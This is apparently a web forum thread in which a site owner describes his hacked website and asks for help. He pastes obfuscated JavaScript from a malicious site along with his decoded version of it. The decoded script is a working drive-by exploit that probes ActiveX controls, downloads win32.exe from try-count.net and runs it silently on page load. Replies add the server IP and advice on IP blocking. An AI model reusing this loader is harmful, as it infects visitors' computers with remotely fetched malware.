I just made a major BREAKTHROUGH in the hacking of my website... currently my website is being hacked "thegermz.com" DON'T GO THERE, YOU'LL GET HACKED. I made a thread here in DP in the server section but they didn't help me much I'm hoping the coding guys know a little more about this... Anyway, the problem started when I went to my site and noticed that on the bottom corner of my firefox browser (where it says what is currently loading) it said "waiting for try-count.net" which I found weird since I've never even linked to or went to that site... and then my pc got blocked and I couldn't even move the mouse seconds after it went unblocked but my pc was very slow then I knew I was hacked and contacted my host but I had to leave in the middle of the chat, I then came back to my site and noticed another website that I never knew about was loading "gate4clicks.net"... I still haven't found anything for that site but I DID find something about the other site, try-count. I looked in google for the name of the site and found this link http://www.who-is-who-in-gpt.com/forum/index.php?showtopic=7855 Apparently they had problems with that site as well... so I went to one of try-count links try-count.net/dl/newnew.php?adv=194 DON'T GO THERE! And found a lot of javascript: <html><body><SCRIPT LANGUAGE="javascript" TYPE="text/javascript">document.write(unescape('%3c%68%74%6d%6c%3e%3c%68%65%61%64%3e%3c%74%69%74%6c%65%3e%3c%2f%74%69%74%6c%65%3e%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%22%6a%61%76%61')); document.write(unescape('%73%63%72%69%70%74%22%3e%66%75%6e%63%74%69%6f%6e%20%4c%6f%67%28%6d%29%20%7b%20%20%20%20%20%20%20%20%76%61%72%20%6c%6f%67%20%3d%20%64%6f%63%75')); document.write(unescape('%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%70%27%29%3b%20%20%20%20%20%20%20%20%6c%6f%67%2e%69%6e%6e%65%72%48%54%4d%4c%20%3d%20%6d')); document.write(unescape('%3b%20%20%20%20%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%62%6f%64%79%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%6c%6f%67%29%3b%20%20%20%20%20%20%20%20')); document.write(unescape('%7d%66%75%6e%63%74%69%6f%6e%20%43%72%65%61%74%65%4f%28%6f%2c%20%6e%29%20%7b%20%20%20%20%20%20%20%20%76%61%72%20%72%20%3d%20%6e%75%6c%6c%3b')); document.write(unescape('%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%6f%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%6e')); Code (markup): That's just a little portion of the source, imagine about 200+ more lines of the same thing so I decided to google "document.write(unescape(" since I've never heard of it and I found that apparently the code is a way to "hide" HTML and/or javascript from other people who view your page's source code. I went to a place that decodes it and found the decoded source, which was <html><body><SCRIPT LANGUAGE="javascript" TYPE="text/javascript">document.write(unescape('<html><head><title></title><script language="java')); document.write(unescape('script">function Log(m) { var log = docu')); document.write(unescape('ment.createElement('p'); log.innerHTML = m')); document.write(unescape('; document.body.appendChild(log); ')); document.write(unescape('}function CreateO(o, n) { var r = null;')); document.write(unescape(' try { eval('r = o.CreateObject(n')); document.write(unescape(')') }catch(e){} if (! r) { ')); document.write(unescape(' try { eval('r = o.CreateObject(n, "")') ')); document.write(unescape('}catch(e){} } if (! r) {')); document.write(unescape(' try { eval('r = o.CreateObject(n, ')); document.write(unescape('"", "")') }catch(e){} } if (! r) ')); document.write(unescape('{ try { eval('r = o.GetObject("", ')); document.write(unescape('n)') }catch(e){} } if (! ')); document.write(unescape('r) { try { eval('r = o.GetObject(n')); document.write(unescape(', "")') }catch(e){} } if ')); document.write(unescape('(! r) { try { eval('r = o.GetObjec')); document.write(unescape('t(n)') }catch(e){} } retu')); document.write(unescape('rn(r); }function Go(a) { Log('Crea')); document.write(unescape('ting helper objects...'); var s = CreateO(')); document.write(unescape('a, "WScript.Shell"); var o = CreateO(a, "A')); document.write(unescape('DODB.Stream"); var e = s.Environment("Proc')); document.write(unescape('ess"); Log('Ceating the XMLHTTP o')); document.write(unescape('bject...'); var url = "http://try-count.net/dl/')); document.write(unescape('194/win32.exe"; var xml = null; var')); document.write(unescape(' bin = e.Item("TEMP")+ "\\" + "metasploit.exe"; ')); document.write(unescape(' var dat; try { xml=new XML')); document.write(unescape('HttpRequest(); } catch(e) { ')); document.write(unescape(' try { xml = new ActiveXObject("Microsoft.XMLHTTP')); document.write(unescape('"); } catch(e) { ')); document.write(unescape(' xml = new ActiveXObject("MSXML2.ServerXMLHT')); document.write(unescape('TP"); } } ')); document.write(unescape(' if (! xml) return(0); Log(''); ')); document.write(unescape(' xml.open("GET", url, false) xml.send(')); document.write(unescape('null); dat = xml.responseBody; Lo')); document.write(unescape('g(''); o.Type = 1; o.Mode = 3; ')); document.write(unescape(' o.Open(); o.Write(dat); o.S')); document.write(unescape('aveToFile(bin, 2); Log('.'); ')); document.write(unescape(' s.Run(bin,0);}function Exploit() {')); document.write(unescape(' var i = 0; var t = new Array('{BD9')); document.write(unescape('6C556-65A3-11D0-983A-00C04FC29E36}','{BD96C556-65A')); document.write(unescape('3-11D0-983A-00C04FC29E36}','{AB9BCEDD-EC7E-47E1-93')); document.write(unescape('22-D4A210617116}','{0006F033-0000-0000-C000-000000')); document.write(unescape('000046}','{0006F03A-0000-0000-C000-000000000046}',')); document.write(unescape(''{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512')); document.write(unescape('B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-43')); document.write(unescape('31-8A26-339E03C0AE3D}','{06723E09-F4C2-43c8-8358-0')); document.write(unescape('9FCD1DB0766}','{639F725F-1B2D-4831-A9FD-8748476820')); document.write(unescape('10}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0')); document.write(unescape('C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA')); document.write(unescape('28-496b-B050-6C07C962476B}',null); while')); document.write(unescape(' (t[i]) { var a = null; ')); document.write(unescape(' if (t[i].substring(0,1) == ')); document.write(unescape(''{') { a = document.create')); document.write(unescape('Element("object"); a.setAt')); document.write(unescape('tribute("classid", "clsid:" + t[i].substring(1, t[')); document.write(unescape('i].length - 1)); } else { ')); document.write(unescape(' try { a = new ActiveXObject(t[i]);')); document.write(unescape(' } catch(e){} } ')); document.write(unescape(' if (a) { tr')); document.write(unescape('y { var')); document.write(unescape(' b = CreateO(a, "WScript.Shell"); ')); document.write(unescape(' if (b) { ')); document.write(unescape(' Log('Loaded ' + t[i]); ')); document.write(unescape(' Go(a); ')); document.write(unescape(' return(0); ')); document.write(unescape(' } } catc')); document.write(unescape('h(e){} } i++; ')); document.write(unescape(' } Log('');}</script></head><body o')); document.write(unescape('nload='Exploit()'><p></p></body></html><html>')); document.write(unescape('<body><script>document.write(unescape("%3c%48%54')); document.write(unescape('%4d%4c%3e%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%6')); Code (markup): And then there are a lot MORE lines of percent numbers.... as you can see that site is malicious and I want to report it but I have no idea how. I also want to block access to my site but I don't know how either so if anyone knows feel free to help.
Hey, I hope this info I'm giving you helps you and stops this from happening. You can repeat some stuff in the code to make it work for multiple ip's and addresses. The IP address for the server that try - count . net is on is: 77.91.229.38 http://www.hybrid6.com/webgeek/2006/12/htaccess-ip-banning-block-bad-visitors.php
jeez, I got the same attack on a fatcow hosting account - then G flagged some of my client's websites.